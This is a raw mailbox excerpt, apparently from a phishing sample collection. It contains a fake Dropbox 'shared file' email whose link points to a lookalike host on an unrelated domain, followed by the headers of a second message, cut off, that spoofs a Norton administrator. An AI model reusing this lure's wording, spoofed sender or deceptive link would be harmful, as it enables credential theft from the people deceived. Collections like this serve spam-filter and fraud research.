From: "Drop Box" <info@ecoleia.com>
Date: Fri, 02 Jun 2017 11:48:58 -0400
Reply-To: gregoryhulltgren@yahoo.com
X-Virus-Scanned: clamav-milter 0.99.2 at gr0
X-Virus-Status: Clean
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 205

You will not see this in a MIME-aware mail reader.
--===============1116639318==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


James used Dropbox to share a file with you  used Dropbox to share a file w=
ith you =

To view the document  Click to open E-Document Here

=A9 2017 DropBox Inc
--===============1116639318==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV id=3Dyui_3_16_0_ym19_1_1496408454994_1790=
0 style=3D"FONT-SIZE: 24px; FONT-FAMILY: Verdana; WHITE-SPACE: normal; WORD=
-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0)=
; FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-I=
NDENT: 0px; -webkit-padding-start: 0px; font-variant-ligatures: normal; fon=
t-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-sty=
le: initial; text-decoration-color: initial" dir=3Dltr data-setdir=3D"false=
"><FONT id=3Dyui_3_16_0_ym19_1_1496408454994_27277 style=3D"-webkit-padding=
-start: 0px" size=3D3><IMG id=3Dyui_3_16_0_ym19_1_1496408454994_17901 style=
=3D"CURSOR: pointer !important; BORDER-TOP: medium none; BORDER-RIGHT: medi=
um none; BORDER-BOTTOM: medium none; BORDER-LEFT: medium none; -webkit-padd=
ing-start: 0px" name=3Dm_-16082076728755406_m_-5279357578726227700_m_208445=
8634614269117_m_-1219515357082689425_m_-6195424555975388660_yui_3_16_0_ym19=
_1_1487567958370_71514 alt=3D"Dropbox Secured logo" src=3D"https://ci6.goog=
leusercontent.com/proxy/nuqbcDB3c9h88BZHyAiZFimOZVdGDDECxfSeNTFA0fGbxFW64KK=
mJZdCjRlAP0Puk5AEzSZRpq4CutB-gphCP5Q-UaGczRibUVX1DBcRBoO0=3Ds0-d-e1-ft#http=
s://qzprod.files.wordpress.com/2013/02/dropbox-logo.png" width=3D158 height=
=3D47 data-id=3D"b83769af-4a73-3583-61ed-305cbe1bd496"><BR id=3Dyui_3_16_0_=
ym19_1_1496408454994_17902 style=3D"-webkit-padding-start: 0px"><FONT id=3D=
yui_3_16_0_ym19_1_1496408454994_17903 style=3D"-webkit-padding-start: 0px" =
color=3D#444444>James used&nbsp;<SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_=
17904 style=3D"-webkit-padding-start: 0px">Dropbox</SPAN>&nbsp;to share a f=
ile with you &nbsp;</FONT></FONT><SPAN style=3D"FONT-SIZE: medium; COLOR: r=
gb(68,68,68); -webkit-padding-start: 0px">used&nbsp;</SPAN><SPAN id=3Dyui_3=
_16_0_ym19_1_1496408454994_17907 style=3D"FONT-SIZE: medium; COLOR: rgb(68,=
68,68); -webkit-padding-start: 0px">Dropbox</SPAN><SPAN style=3D"FONT-SIZE:=
 medium; COLOR: rgb(68,68,68); -webkit-padding-start: 0px">&nbsp;to share a=
 file with you</SPAN></DIV>
<DIV id=3Dyui_3_16_0_ym19_1_1496408454994_17905 style=3D'FONT-SIZE: 24px; F=
ONT-FAMILY: "lucida console", sans-serif; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-S=
TYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0=
px; -webkit-padding-start: 0px; font-variant-ligatures: normal; font-varian=
t-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: init=
ial; text-decoration-color: initial' dir=3Dltr data-setdir=3D"false"><FONT =
id=3Dyui_3_16_0_ym19_1_1496408454994_27279 style=3D"-webkit-padding-start: =
0px" size=3D3><BR id=3Dyui_3_16_0_ym19_1_1496408454994_17909 style=3D"-webk=
it-padding-start: 0px"><FONT id=3Dyui_3_16_0_ym19_1_1496408454994_17910 sty=
le=3D"-webkit-padding-start: 0px" face=3D"HelveticaNeue, Helvetica Neue, He=
lvetica, Arial, Lucida Grande, sans-serif">To view the document</FONT><FONT=
 id=3Dyui_3_16_0_ym19_1_1496408454994_18478 style=3D"FONT-FAMILY: Verdana; =
-webkit-padding-start: 0px" face=3D"helveticaneue, helvetica neue, helvetic=
a, arial, lucida grande, sans-serif"><SPAN class=3DApple-converted-space>&n=
bsp;</SPAN>&nbsp;</FONT><SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_17911 st=
yle=3D"FONT-FAMILY: Verdana; -webkit-padding-start: 0px">Click to open&nbsp=
;</SPAN><A id=3Dyui_3_16_0_ym19_1_1496408454994_17912 class=3Dedited-link-e=
ditor style=3D"CURSOR: text !important; TEXT-DECORATION: underline !importa=
nt; FONT-FAMILY: Verdana; BACKGROUND: none transparent scroll repeat 0% 0%;=
 COLOR: blue; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px;=
 OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert=
; PADDING-RIGHT: 0px; -webkit-padding-start: 0px" href=3D"http://dropboxfil=
e.smp1jepon.sch.id/Dropbox/" name=3Dm_-16082076728755406_m_-527935757872622=
7700_m_2084458634614269117_m_-1219515357082689425_m_-6195424555975388660_yu=
i_3_16_0_ym19_1_1487567958370_71523 rel=3Dnofollow target=3D_blank>E-Docume=
nt</A><SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_17913 style=3D"FONT-FAMILY=
: Verdana; -webkit-padding-start: 0px">&nbsp;Here</SPAN><BR id=3Dyui_3_16_0=
_ym19_1_1496408454994_17914 style=3D"-webkit-padding-start: 0px"><BR id=3Dy=
ui_3_16_0_ym19_1_1496408454994_17915 style=3D"-webkit-padding-start: 0px"><=
SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_17916 style=3D"FONT-FAMILY: Verda=
na; -webkit-padding-start: 0px">=A9 2017&nbsp;<SPAN id=3Dyui_3_16_0_ym19_1_=
1496408454994_17917 style=3D"-webkit-padding-start: 0px">DropBox</SPAN>&nbs=
p;Inc</SPAN></FONT></DIV></BODY></HTML>
--===============1116639318==--

From jose@monkey.org Sat Jun  3 13:07:38 2017 +0000
Return-Path: mailscan@norton.com
Delivered-To: jose@monkey.org
X-FDA: 72910762596.22.duck52_2588b9e362a2b
X-Spam-Summary: 20,1.5,0,b53ac106157f7cf3,d41d8cd98f00b204,mailscan@norton.com,:,RULES_HIT:41:72:355:375:379:474:541:543:800:962:967:969:973:978:983:988:989:1189:1208:1224:1260:1261:1263:1311:1313:1314:1345:1381:1431:1437:1515:1516:1517:1534:1542:1588:1589:1623:1711:1730:1747:1777:1792:2393:2525:2543:2560:2563:2610:2682:2685:2693:2859:2890:2901:2902:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3352:3865:3866:3867:3868:3870:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4552:5007:6261:6674:6678:8603:9025:9040:9080:9388:9411:9416:9908:10009:10241:10346:10881:10906:11257:11658:11914:12043:12438:12517:12519:12555:12760:12891:12955:12958:12959:12986:13095:13141:13230:14051:14096:14158:14181:14721:14828:14849:14885:21080:21433:21450:21451:21524:21554:21604:21627:30001:30021:30022:30054:30070,0,RBL:202.169.57.78:@norton.com:.lbl8.mailshell.net-62.22.113.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,
X-HE-Tag: duck52_2588b9e362a2b
X-Filterd-Recvd-Size: 3907
Received: from mail.cipinangindah.com (mail.cipinangindah.com [202.169.57.78])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat,  3 Jun 2017 13:07:37 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by mail.cipinangindah.com (Postfix) with ESMTP id 55446CCBB379
	for <jose@monkey.org>; Sat,  3 Jun 2017 19:40:41 +0700 (WIB)
Received: from mail.cipinangindah.com ([127.0.0.1])
	by localhost (mail.cipinangindah.com [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id EwArw_7ZAPDa for <jose@monkey.org>;
	Sat,  3 Jun 2017 19:40:41 +0700 (WIB)
Received: from localhost (localhost [127.0.0.1])
	by mail.cipinangindah.com (Postfix) with ESMTP id 0E41CDC54936
	for <jose@monkey.org>; Sat,  3 Jun 2017 18:39:23 +0700 (WIB)
X-Virus-Scanned: amavisd-new at mail.cipinangindah.com
Received: from mail.cipinangindah.com ([127.0.0.1])
	by localhost (mail.cipinangindah.com [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id SuuWg3kCi56p for <jose@monkey.org>;
	Sat,  3 Jun 2017 18:39:22 +0700 (WIB)
Received: from TRINITY (unknown [139.192.58.0])
	by mail.cipinangindah.com (Postfix) with ESMTPSA id 23DBDDC830C9
	for <jose@monkey.org>; Sat,  3 Jun 2017 17:56:35 +0700 (WIB)
Message-ID: <05d852b6-42889-e9c62892875347@trinity>
Reply-To: "Administrator." <mailscan@norton.com>
